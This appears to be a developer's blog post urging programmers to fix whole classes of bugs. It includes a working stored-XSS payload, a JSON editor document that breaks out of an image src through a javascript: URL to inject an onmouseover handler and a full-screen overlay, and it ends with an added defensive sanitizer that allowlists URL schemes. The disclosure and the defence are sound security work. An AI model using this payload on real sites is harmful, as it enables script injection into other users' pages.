How a good programmer differs from a bad one, or why you need to go beyond

This will be my shortest article.

Once upon a time I was young and green and I solved problems exactly the way the juniors solve them. The algorithm is this:

  1. Learn about the problem

  2. Localize the problem

  3. Google the problem and solution

  4. Fix the problem

For example: the Excel file contains an error and therefore cannot be processed. I opened the file, edited the problematic line, closed the file. Problem solved.

Or another example: the script did not work due to an error in the code. I fix the error, the script starts to work.

10 years have passed… The algorithm has changed:

  1. Learn about the problem

  2. Localize the problem

  3. Google the problem and see many solutions

  4. Understand why it happened

  5. Know what needs to be done to make sure this doesn’t happen again.

  6. Understand what else is affected by the problem

  7. Understand where else similar problems could potentially occur

  8. Fix the problem

  9. Depending on the amount of effort required, fix everything related

  10. Tell the guys in Slack about your fail (== share your experience)

For example: the Excel file contains an error and therefore cannot be processed. I open the file, figure out how the problematic line got into it, try to make sure it can't get there anymore, look for the same erroneous lines in the file, look for other potential errors, then fix the file myself or send it back for revision. Problem solved – fully or partially, but with full awareness of which.

Or another example: the script did not work due to an error in the code. I figure out who wrote the script and why I wrote it by hand instead of calling some configuration and deployment command, where else such errors can occur (both in this project and in other clients' projects), fix it, and do my best to make sure it doesn't happen again.

Why all this

Please don’t solve a specific problem. It never works. It will break again.

Solve a class of problems. Go beyond the problem, look for similar ones, look for related ones. Be responsible and curious.

Otherwise I will keep finding XSS in the same places I wrote about earlier.

Nothing is stolen or broken

And if you're not feeling bold, here is the traditional video:

The payload is the same as in the previous article:

{
	"type": "persona",
	"attrs": {
		"inserted": false
	},
	"content": [
		{
			"type": "persona_image",
			"attrs": {
				"src": "javascript:\"></a>
                <div/onmouseover=alert('xss')>
                    <div/style=\"position:fixed;bottom:0;width:100%;height:100vh;background-image:url('https://c.tenor.com/GjsMO1r7HGMAAAAC/hyenas-lion-king.gif');background-position:center;background-repeat:no-repeat;background-size:cover;\">
                         &nbsp;
                    </div>
                </div>
                <!--<a",
				"class": "image image-persona"
			}
		},
		{
			"type": "persona_heading",
			"content": [
				{
					"type": "text",
					"text": "<-- Нажимайте сюда"
				}
			]
		},
		{
			"type": "paragraph",
			"attrs": {
				"align": null,
				"simple": false,
				"persona": false
			}
		}
	]
}
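Applying the "solve a class of problems" advice to this payload, here is an added example (my code, not from the post or from the product it targets): instead of patching the one `persona_image.src` the payload abuses, it walks every node of the document and applies the same scheme allowlist to every URL-bearing attribute. The node and attribute names and the sample document are assumptions modelled on the payload above.

```python
from urllib.parse import urlsplit

URL_ATTRS = {"src", "href"}       # assumed names of URL-bearing attributes
SAFE_SCHEMES = {"http", "https"}  # scheme-less (relative) URLs also pass


def is_safe_url(value):
    """True only for http(s)/relative URLs with no markup characters."""
    if not isinstance(value, str):
        return False
    # Drop whitespace and control characters: browsers ignore them inside
    # a scheme, so "java\tscript:" must be treated as "javascript:".
    cleaned = "".join(c for c in value if c.isprintable() and not c.isspace())
    # Quotes and angle brackets have no business in a URL attribute and are
    # exactly what the payload above uses to break out of src="...".
    if any(c in cleaned for c in "<>\"'"):
        return False
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


def find_unsafe_urls(node, path="$"):
    """Walk the whole node tree; return (json_path, value) for every unsafe URL."""
    findings = []
    if isinstance(node, dict):
        attrs = node.get("attrs")
        if isinstance(attrs, dict):
            for key, value in attrs.items():
                if key in URL_ATTRS and not is_safe_url(value):
                    findings.append((f"{path}.attrs.{key}", value))
        for i, child in enumerate(node.get("content") or []):
            findings.extend(find_unsafe_urls(child, f"{path}.content[{i}]"))
    return findings


# Constructed sample modelled on the post's payload (hypothetical node names):
# the first image smuggles a javascript: URL, the nested one is a normal image.
SAMPLE_DOC = {
    "type": "persona",
    "content": [
        {"type": "persona_image",
         "attrs": {"src": "javascript:\"></a><div/onmouseover=alert('xss')>"}},
        {"type": "paragraph",
         "content": [{"type": "persona_image",
                      "attrs": {"src": "https://example.com/ok.png"}}]},
    ],
}

if __name__ == "__main__":
    for json_path, value in find_unsafe_urls(SAMPLE_DOC):
        print(f"reject {json_path}: {value[:40]!r}")
```

Protocol-relative URLs (`//host/...`) pass this check because they resolve to http(s); tighten `is_safe_url` if your editor should only accept absolute or same-origin images.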

Come to my Telegram channel: Pogromist's blog. It's just a link, not XSS 🙂
